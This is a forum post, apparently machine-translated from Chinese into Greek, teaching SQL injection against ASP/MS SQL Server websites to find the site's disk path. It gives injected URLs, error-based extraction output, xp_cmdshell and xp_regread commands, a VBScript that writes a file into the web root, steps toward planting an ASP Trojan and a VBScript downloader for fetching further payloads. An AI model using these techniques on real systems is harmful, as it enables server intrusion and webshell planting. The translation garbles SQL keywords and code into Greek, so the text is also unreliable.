SQL injection για να αποκτήσετε την πλήρη διαδρομή του ιστότοπου
Εάν ο ιστότοπος έχει μόνο 80 θύρες, θα βρείτε πιο χρήσιμες τις ακόλουθες μεθόδους
Σχεδόν όλες οι μέθοδοι που χρησιμοποιούνται σε αυτό δεν είναι αυτές που ανακάλυψα και το άρθρο περιλαμβάνει πάντα κάποια προσωπική εμπειρία και δεξιότητες κατά την ένεση
Υπάρχουν 4 μέθοδοι (τώρα γνωστές)
Πρώτη μέθοδος:
Αυτή είναι η <怪异的SQL注入>μέθοδος που εισήχθη το < >
Χρησιμοποιώντας την xp_dirtree του sqlserver, ας μιλήσουμε πρώτα για τη μέθοδο και, στη συνέχεια, ας μιλήσουμε για τα πλεονεκτήματα και τα μειονεκτήματά της (ορισμένες προσθήκες γίνονται με βάση το αρχικό κείμενο)
Δημιουργία πινάκων
Δήλωση:http://www.xxxxx.com/down/list.asp?id=1;create Table Dirs(Μονοπάτια Varchar(1000))--
Πίσω: Κανονικές πληροφορίες! Σημαίνει ότι ο πίνακας δημιουργήθηκε με επιτυχία! Συνέχισε!
(Αυτό που κατασκευάστηκε είναι λίγο μεγαλύτερο από το πρωτότυπο, γιατί συνάντησα ένα αρχείο με μεγάλο όνομα και διέγραψα το id επειδή είναι άχρηστο)
Δήλωση:http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'c:\' --
Επιστροφές: Κανονικές πληροφορίες. Σημαίνει ότι όλοι οι κατάλογοι που είναι γραμμένοι στη μονάδα δίσκου C είναι επιτυχημένοι! Ωραία! Το επόμενο βήμα είναι να αποκτήσετε τον μετρητή! Παραβίασέ το και βγες έξω. (Φαίνεται ότι υπάρχει μόνο ένας τρόπος για να γίνει αυτό)
Δήλωση:http://www.xxxxx.com/down/list.asp?id=1 και 0<>(επιλέξτε τις 1 κορυφαίες διαδρομές από τις οδηγίες)-
Επιστρέφει: Σφάλμα 80040e07 της υπηρεσίας παροχής Microsoft OLE DB για SQL Server
Παρουσιάζεται σφάλμα σύνταξης κατά τη μετατροπή της τιμής varchar '@Inetpub' σε στήλη με τύπο δεδομένων int.
Στη συνέχεια, τα ονόματα των καταλόγων στον πίνακα ξεσπούν με τη σειρά τους!
Δήλωση:http:// http://www.xxxxx.com/down/list.asp?id=1 και 0<>(επιλέξτε 1 κορυφαίες διαδρομές από
Οδηγίες όπου μονοπάτια που δεν είναι μέσα ('@Inetpub'))--
Επιστρέφει: Σφάλμα 80040e07 της υπηρεσίας παροχής Microsoft OLE DB για SQL Server
Παρουσιάστηκε συντακτικό σφάλμα κατά τη μετατροπή της τιμής varchar 'test' σε στήλη με τύπο δεδομένων int.
Στη συνέχεια, τα ονόματα των καταλόγων στον πίνακα ξεσπούν με τη σειρά τους!
Εντάξει, ας συνεχίσουμε
Δήλωση:http:// http://www.xxxxx.com/down/list.asp?id=1 και 0<>(επιλέξτε 1 κορυφαίες διαδρομές από
dirs όπου μονοπάτια που δεν είναι μέσα( '@Inetpub','test'))--
Επιστρέφει: Σφάλμα 80040e07 της υπηρεσίας παροχής Microsoft OLE DB για SQL Server
Παρουσιάζεται συντακτικό σφάλμα κατά τη μετατροπή της τιμής varchar 'haha' σε στήλη με τύπο δεδομένων int.
Στη συνέχεια, τα ονόματα των καταλόγων στον πίνακα ξεσπούν με τη σειρά τους!
Εντάξει, θα πρέπει να ξέρετε πώς να το κάνετε, χαχα, απλά προσθέστε το όνομα του πίνακα που παίρνετε σε αυτήν την παρένθεση, βάλτε όσα θέλετε,
Ένα μικρό κόλπο:
Μερικές φορές θα διαπιστώσετε ότι όταν η είσοδος είναι παρόμοια
http://www.xxxxx.com/down/list.asp?id=1 και 0<>(επιλέξτε τις 1 κορυφαίες διαδρομές από τις οδηγίες)-
Αντί να εμφανίζεται σφάλμα, η ιστοσελίδα εμφανίζεται κανονικά
Ζαλισμένος, μην είσαι νευρικός
Κοιτάξτε το 0<> (επιλέξτε τα πρώτα 1 μονοπάτια από το dirs) για να δείξετε ότι η επιστροφή είναι ένας αριθμός,
Χαχα, δοκιμάστε το και δείτε πόσο είναι
100>(επιλέξτε τις 1 κορυφαίες διαδρομές από τις οδηγίες)
Επιστροφή στην κανονικότητα
Χαχα, μπορείτε γρήγορα να μαντέψετε με αυτή τη μέθοδο μεγαλύτερο ή λιγότερο
Εντάξει, ας συνεχίσουμε
Για παράδειγμα, όταν εμφανίζεται
59=(επιλέξτε τις 1 κορυφαίες διαδρομές από τις διευθύνσεις)
Επιστροφή στο φυσιολογικό,
Εντάξει, το όνομα είναι 59
Εισαγάγετε ως εξής
http:// http://www.xxxxx.com/down/list.asp?id=1 και 0<>(επιλέξτε 1 κορυφαίες διαδρομές από
Διαδρομές όπου δεν υπάρχουν μονοπάτια ('59'))--
Θυμηθείτε να βάλετε εισαγωγικά
Η παρακάτω μέθοδος είναι ίδια με την αρχική
Υπάρχει επίσης ένα πρόβλημα
Μερικές φορές όταν εισάγω το 59 χρησιμοποιώντας την παραπάνω μέθοδο, διαπιστώνω ότι ο επόμενος φάκελος εξακολουθεί να είναι 59
Τι τρέχει?
Χεχε, δεν ξέρω αν έχετε παρατηρήσει ότι το 059 και το 59 είναι το ίδιο;
Γι' αυτό χαχα,
http:// http://www.xxxxx.com/down/list.asp?id=1 και 0<>(επιλέξτε 1 κορυφαίες διαδρομές από
Οδηγίες όπου δεν υπάρχουν μονοπάτια ( '059'))--
Βρήκα ότι εμφανίζεται το όνομα του επόμενου φακέλου, εντάξει
Ανάλυση πλεονεκτημάτων και μειονεκτημάτων:
Το πλεονέκτημα είναι ότι όλοι οι χρήστες του sqlserver μπορούν να το χρησιμοποιήσουν, επειδή xp_dirtree εφαρμόζει το δικαίωμα PUBLIC,
Το μειονέκτημα είναι ότι εμφανίζει τα ονόματα όλων των φακέλων στον κατάλογο και η διάταξη φαίνεται να μην είναι σε καμία σειρά, με λίγα λόγια, είναι επώδυνο να βρείτε το φάκελο που θέλετε σε χιλιάδες ή δεκάδες χιλιάδες φακέλους.
Και ξέρετε ότι η ύπαρξη αυτού του φακέλου δεν είναι εγγυημένο ότι βρίσκεται στον ριζικό κατάλογο, κάτι που είναι πραγματικά οδυνηρό, πολλές φορές εξαρτάται από την τύχη και την αντοχή.
Σου εύχομαι επιτυχία
Μέθοδος 2:
Χρησιμοποιήστε xp_cmdshell
Χαχα, όλοι πρέπει να είναι εξοικειωμένοι με αυτό, επιτρέψτε μου να το πω εν συντομία
Δημιουργία πινάκων
Δήλωση:http://www.xxxxx.com/down/list.asp?id=1;create Table Dirs(Μονοπάτια Varchar(1000))--
Πίσω: Κανονικές πληροφορίες! Σημαίνει ότι ο πίνακας δημιουργήθηκε με επιτυχία! Συνέχισε!
(Αυτό που κατασκευάστηκε είναι λίγο μεγαλύτερο από το πρωτότυπο, επειδή συνάντησα ένα αρχείο με μεγάλο όνομα και διέγραψα αυτό το αναγνωριστικό επειδή είναι άχρηστο.)
Δήλωση:http://www.xxxxx.com/down/list.asp?id=1;insertdirs exec master.dbo.xp_cmdshell 'dir c:\ /B/D' --
Επιστροφές: Κανονικές πληροφορίες. Σημαίνει ότι όλοι οι κατάλογοι που είναι γραμμένοι στη μονάδα δίσκου C είναι επιτυχημένοι! dir c:\ Το /B/D χρησιμοποιείται εδώ, χαχα, αν δεν ξέρετε τι κάνει το /B/D, προσπαθήστε να δείτε τι κάνει
Δήλωση:http://www.xxxxx.com/down/list.asp?id=1 και 0<>(επιλέξτε τις 1 κορυφαίες διαδρομές από τις οδηγίες)-
Επιστρέφει: Σφάλμα 80040e07 της υπηρεσίας παροχής Microsoft OLE DB για SQL Server
Παρουσιάζεται σφάλμα σύνταξης κατά τη μετατροπή της τιμής varchar '@Inetpub' σε στήλη με τύπο δεδομένων int.
Στη συνέχεια, τα ονόματα των καταλόγων στον πίνακα ξεσπούν με τη σειρά τους!
Δήλωση:http:// http://www.xxxxx.com/down/list.asp?id=1 και 0<>(επιλέξτε 1 κορυφαίες διαδρομές από
Οδηγίες όπου μονοπάτια που δεν είναι μέσα ('@Inetpub'))--
Επιστρέφει: Σφάλμα 80040e07 της υπηρεσίας παροχής Microsoft OLE DB για SQL Server
Παρουσιάστηκε συντακτικό σφάλμα κατά τη μετατροπή της τιμής varchar 'test' σε στήλη με τύπο δεδομένων int.
Στη συνέχεια, τα ονόματα των καταλόγων στον πίνακα ξεσπούν με τη σειρά τους!
Η μέθοδος είναι η ίδια με την παραπάνω, οπότε δεν θα μιλήσω γι' αυτήν
Μερικές φορές μπορούμε επίσης να κάνουμε κάτι με τις ακόλουθες δύο επεκτάσεις
1) Μπορούμε να εκμεταλλευτούμε xp_availablemedia για να λάβουμε όλες τις τρέχουσες μονάδες δίσκου και να τις αποθηκεύσουμε στον πίνακα dirs:
5 ; insert dirs exec master.dbo.xp_availablemedia; --
Μπορούμε να λάβουμε τη λίστα των μονάδων δίσκου και τις σχετικές πληροφορίες ρωτώντας τα περιεχόμενα του temp
(2) Μπορούμε να χρησιμοποιήσουμε xp_subdirs για να πάρουμε τη λίστα των υποκαταλόγων και να τους αποθηκεύσουμε στον πίνακα dirs:
5 ; εισάγετε στο dirs exec master.dbo.xp_subdirs 'c:\' ; --
Ανάλυση πλεονεκτημάτων και μειονεκτημάτων:
Προφανώς, αυτό δεν θα xp_dirtree την κατάσταση όπου όλοι οι κατάλογοι είναι συγκεντρωμένοι, θα εμφανίζεται μόνο ο κατάλογος πρώτου επιπέδου, ο οποίος είναι πολύ πιο εύκολο να βρεθεί.
Τα μειονεκτήματα είναι επίσης προφανή, μόνο η SA έχει αυτήν την άδεια και είναι επίσης πιθανό ο διαχειριστής να διέγραψε αυτήν την επέκταση (εξάλλου, είναι πολύ ισχυρή).
Μέθοδος 3:
Αυτή η προσέγγιση είναι καλή
Ακολουθεί το αρχικό κείμενο
Σκέφτηκα να χρησιμοποιήσω το πρόγραμμα adsutil.vbs, το οποίο εκτέλεσα
a'; εκτελεστικός πλοίαρχος.. xp_cmdshell 'cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/1/root>a.txt'; --
Δεν είναι μακρύ; Μέσω αυτού, μπορούμε να στήσουμε τον πρώτο εικονικό ιστότοπο στις υπηρεσίες IIS (συμπεριλαμβανομένου του πραγματικού καταλόγου όπου βρίσκεται, φυσικά)
Εισαγωγή σε a.txt
Η προεπιλογή για την πραγματική τοποθεσία του a.txt είναι φυσικά c:\winnt\system32, κάτι που στην πραγματικότητα δεν αποτελεί πρόβλημα, αλλά όταν συναντάτε έναν διαχειριστή που ορίζει adsutil.vbs
Διαγράψτε το ή βάλτε το αλλού
Δεν μπορούμε να κάνουμε τίποτα γι' αυτό (δεν μπορείτε να γράψετε ένα με την εντολή echo μόνοι σας)
Βήμα 2: Χρησιμοποιήστε την εντολή echo για να γράψετε τον ακόλουθο κώδικα στο c:\, που δεν είναι πολύς
..... xp_cmdshell 'echo set fso1=createobject("scripting.filesystemobject">c:\read.vbs'; --
..... xp_cmdshell 'echo set wshShell = wscript.createobject("wscript.shell">>c:\read.vbs'
; --
.....
-------------------read.vbs---------------------------------
set fso1=createobject("scripting.filesystemobject"
Ορισμός WshShell = Wscript.createObject("Wscript.Shell"
spa=WshShell.Environment("process"("windir"
set fil =fso1.opentextfile(spa & "\system32\aa.txt"
do ενώ δεν fil.atendofstream
nr=fil.readline
if left(nr,4)="Διαδρομή" τότε
pa=mid(nr,instr(nr,"" 3,len(nr)-instr(nr,""-3)
έξοδος do
τέλος αν
βρόχος
set fil1 =fso1.opentextfile(pa &"\dd.asp",2;true)
fil1.writeline ""
---------------κόψτε εδώ-------------------------------------
Βήμα 3: Φυσικά, είναι να εκτελέσουμε το read.vbs, ώστε να μπορούμε να διαβάσουμε το περιεχόμενο στο aa.txt και να βρούμε την πραγματική διαδρομή του ιστότοπου
Στη συνέχεια, γράψτε ένα αρχείο που ονομάζεται dd.asp στον ριζικό κατάλογο του ιστότοπου και θα ξέρετε αν μπορείτε να το δοκιμάσετε με επιτυχία
εκτελώhttp://x.x.x.x/dd.asp
Επιστρέφει: \xxx
Χαχα, είναι ένας καλός τρόπος,
Ωστόσο, το αρχικό κείμενο φαίνεται να έχει κάποια προβλήματα
Είναι
set fil =fso1.opentextfile(spa %2B "\system32\aa.txt"
set fil1 =fso1.opentextfile(pa%2B"\dd.asp",2;true)
Παρουσιάζεται σφάλμα κατά την υποβολή δύο προτάσεων
Καταλήξαμε λοιπόν στο σύμβολο συν, το οποίο έχει την ίδια λειτουργία με το &
Και τι να γράψω για dd.asp; Γράψε στον πα, χαχα
Χαχα, το άλλαξα
-------------------read.vbs---------------------------------
set fso1=createobject("scripting.filesystemobject"
Ορισμός WshShell = Wscript.createObject("Wscript.Shell"
spa=WshShell.Environment("process"("windir"
set fil =fso1.opentextfile(spa "\system32\aa.txt"
do ενώ δεν fil.atendofstream
nr=fil.readline
if left(nr,4)="Διαδρομή" τότε
pa=mid(nr,instr(nr,"" 3,len(nr)-instr(nr,""-3)
έξοδος do
τέλος αν
βρόχος
set fil1 =fso1.opentextfile(pa "\dd.asp",2;true)
fil1.writeline pa
---------------κόψτε εδώ--------------------------------------
Επειδή ο αριθμός ώρας μετατρέπεται σε κενό διάστημα κατά την υποβολή σε ένα πρόγραμμα περιήγησης, θα πρέπει επίσης να ορίσετε το
Γίνεται %2B, εντάξει, θα πρέπει να είναι μια χαρά, ως εξής
-------------------read.vbs---------------------------------
set fso1=createobject("scripting.filesystemobject"
Ορισμός WshShell = Wscript.createObject("Wscript.Shell"
spa=WshShell.Environment("process"("windir"
set fil =fso1.opentextfile(spa %2B "\system32\aa.txt"
do ενώ δεν fil.atendofstream
nr=fil.readline
if left(nr,4)="Διαδρομή" τότε
pa=mid(nr,instr(nr,"" 3,len(nr)-instr(nr,""-3)
έξοδος do
τέλος αν
βρόχος
set fil1 =fso1.opentextfile(pa %2B "\dd.asp",2;true)
fil1.writeline pa
---------------κόψτε εδώ--------------------------------------
Αν διαπιστώσουμε ότι το 1 δεν υπάρχει, μπορούμε να γίνουμε 2, 3, 4...........
a'; εκτελεστικός πλοίαρχος.. xp_cmdshell 'cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/2/root>a.txt'; --
Αλλά αυτή η μέθοδος μπορεί να χρησιμοποιηθεί μόνο στα Windows 2000, επειδή οι διευθύνσεις των νεοδημιουργημένων ιστότοπων κάτω από το 2003 δεν είναι ταξινομημένες σύμφωνα με το 1234, φαίνεται να δημιουργούνται τυχαία και έχω συγκρίνει αρκετές κάτω από το 2003
διεύθυνση, δεν βρέθηκε κανονικότητα.
Ανάλυση πλεονεκτημάτων και μειονεκτημάτων:
Το ίδιο xp_cmdshell Δεν μπορεί να το χρησιμοποιήσει κάθε χρήστης! Ένα άλλο πρόβλημα είναι ότι το αρχείο adsutil δεν υπάρχει απαραίτητα ή δεν βρίσκεται απαραίτητα σε αυτήν τη διαδρομή, αν και μπορείτε να το χρησιμοποιήσετε εάν σκοπεύετε
Η Echo γράφει ένα (χαχα, παλιό και παλιό) και μια άλλη ερώτηση είναι, τι γίνεται αν υπάρχουν πολλοί ιστότοποι στον κεντρικό υπολογιστή; Έχω γνωρίσει έναν οικοδεσπότη με εννέα ιστότοπους και μόνο ο όγδοος είναι χρήσιμος
Ναι, λιποθυμία, είναι δύσκολο για κανέναν να έχει την υπομονή να επιμείνει τόσο πολύ, ίσως έχει καταρρεύσει εδώ και πολύ καιρό. Επίσης, δεν μπορεί να χρησιμοποιηθεί το 2003!
Αλλά για να είμαι ειλικρινής, αυτή η μέθοδος είναι πράγματι μια καλή μέθοδος
Μέθοδος 4:
Αυτή η μέθοδος είναι η ανάγνωση της διαδρομής από το μητρώο μέσω xp_regread κ.λπ
Συνιστώνται τα ακόλουθα για να αποκτήσετε τη διαδρομή της ιστοσελίδας (διαβάστε το μητρώο μέσω αποθηκευμένων διαδικασιών):
Χρησιμοποιήστε την ενσωματωμένη αποθηκευμένη διαδικασία xp_regread (ανάγνωση κλειδιού μητρώου, δημόσια άδεια):
Δήλωση: http://www.xxx.com/list.asp?classid=1; create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Δηλώστε@test
varchar(20) εκτελεστικός πλοίαρχος.. xp_regread @rootkey= HKEY_LOCAL_MACHINE , @key=
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\ , @value_name= / , values=@test OUTPUT εισαγωγή σε διαδρομές
(διαδρομή) τιμές(@test)
Προεπιλεγμένη διαδρομή IIS στο μητρώο HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\
Χρησιμοποιήστε το πεδίο ριπής για να διαβάσετε την τιμή της βάσης δεδομένων:
Δήλωση: http://www.xxx.com/list.asp?classid=1 και 0<>(επιλέξτε τις πρώτες 1 διαδρομές από το newtable)--return: Υπηρεσία παροχής Microsoft OLE DB για
Το σφάλμα προγραμμάτων οδήγησης ODBC 80040e07 [Microsoft][Πρόγραμμα οδήγησης ODBC SQL Server][SQL Server] μετατρέπει την τιμή varchar E:\www,,201 σε τύπο δεδομένων int
στήλη.
Αυτό σημαίνει ότι ο κατάλογος της ιστοσελίδας βρίσκεται στο E:\www και, στη συνέχεια, μπορείτε επίσης να χρησιμοποιήσετε το FSO για να γράψετε απευθείας στο ASP Trojan
Τι γίνεται αν δεν μπορείτε να αποκτήσετε έναν κατάλογο ιστού; Πρέπει να μαντέψετε εάν ο ιστότοπος χρησιμοποιεί το προεπιλεγμένο WEB ή το όνομα τομέα ως WEB.
δηλώστε @o int exec sp_oacreate wscript.shell , @o έξω exec sp_oamethod @o, run , NULL,' cscript.exe c:
\inetpub\wwwroot\mkwebdir.vbs -w "προεπιλεγμένος ιστότοπος" -v "e","e:\"'
Δημιουργήστε έναν εικονικό κατάλογο E κάτω από την προεπιλεγμένη τοποθεσία WEB, δείχνοντας στο E: κάτω από το δίσκο.
δηλώστε @o int exec sp_oacreate wscript.shell , @o έξω exec sp_oamethod @o, run , NULL,' cscript.exe c:
\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e περιήγηση'
Είναι καλό να προσθέσετε χαρακτηριστικά περιήγησης στον εικονικό κατάλογο e. Ανοίξτε μια εικονική υπηρεσία για τον εαυτό σας. Σκεπτόμενος αυτές τις διαδρομές καταλόγου ιστοσελίδων, το κεφάλι μου είναι σχεδόν σπασμένο. Τώρα άνοιξα τα μάτια μου. Αυτό είναι το WEBSHELL που χρησιμοποιεί MS
Η SQL είναι το τέλος της δουλειάς μας και η επόμενη δουλειά πρέπει να είναι η δική σας.
Χαχα, η μέθοδος είναι καλή, διαβάστε την μέσω της φόρμας εγγραφής, βολική και γρήγορη!
Ανάλυση πλεονεκτημάτων και μειονεκτημάτων:
Το πλεονέκτημα είναι, φυσικά, ότι είναι βολικό και γρήγορο. Το μειονέκτημα είναι ότι μπορείτε να δείτε μόνο τη διαδρομή του προεπιλεγμένου ιστότοπου IIS και αν δεν είναι πλέον ο προεπιλεγμένος ιστότοπος, τότε δεν μπορείτε να κάνετε τίποτα (το παρακολούθησα με το regsnape), αν είναι κάτω από το 2003
Δηλαδή, ακόμη και η προεπιλεγμένη διαδρομή ιστότοπου δεν εμφανίζεται! Στον πόνο
Παρεμπιπτόντως, στην πραγματικότητα, υπάρχουν και άλλοι τρόποι για να συνεχίσετε την εισβολή εκτός από την εύρεση της διαδρομής του ιστότοπου, όπως η μεταφόρτωση του Trojan αναπήδησης μέσω του tftp ή η σύνταξη ενός iget.vbs για λήψη του dongdong που θέλετε
Ο κωδικός iget.vbs έχει ως εξής:
---------αρχή----------
Set xPost = createObject("Microsoft.XMLHTTP"
xPost.Open "GET",LCase(WScript.Arguments(0)),0
xPost.Send()
Set sGet = createObject("ADODB. Ρεύμα"
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile LCase(WScript.Arguments(1)),2
----------τέλος-----------
Συμπλήρωμα σε αυτό το άρθρο:
Πρόσφατα, διαπίστωσα ότι η κατανόησή μου για τις οδηγίες του Προέδρου Μάο δεν ήταν αρκετά βαθιά, και θα ήθελα να προσθέσω εδώ
Στην πραγματικότητα, οι παραπάνω μέθοδοι δεν χρειάζεται να συγκριθούν καθόλου xp_dirtree είναι οι καλύτερες, αρκεί αυτή η μία μέθοδος να είναι αρκετή
Απλώς επειδή ήμουν πολύ ..............
Σήμερα, θα ξεθάψω ξανά το μυστικό της xp_dirtree
Εντάξει, ας κάνουμε exec master: xp_dirtree'd:/δοκιμή'
Ας υποθέσουμε ότι έχουμε δύο φακέλους στη δοκιμή, τη δοκιμή1 και τη δοκιμή2 και τη δοκιμή3 στη δοκιμή1
Τα αποτελέσματα δείχνουν
Βάθος υποκαταλόγου
δοκιμή1 1
Δοκιμή3 2
Δοκιμή2 1
Χαχα βρήκα ότι δεν υπάρχει βάθος που είναι η σειρά του καταλόγου
Εντάξει, ξέρεις τι να κάνεις
http://www.xxxxx.com/down/list.asp?id=1;create Table Dirs(μονοπάτια varchar(1000),id int)--
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
http://www.xxxxx.com/down/list.asp?id=1 και 0<>(επιλέξτε τις κορυφαίες 1 διαδρομές από το DIRS όπου id=1)-
Εφόσον προστίθεται το id=1, είναι ο κατάλογος πρώτου επιπέδου.
|
Δημοσιεύτηκε στις 7/2/2015 10:19:16 μ.μ.
|
|
|
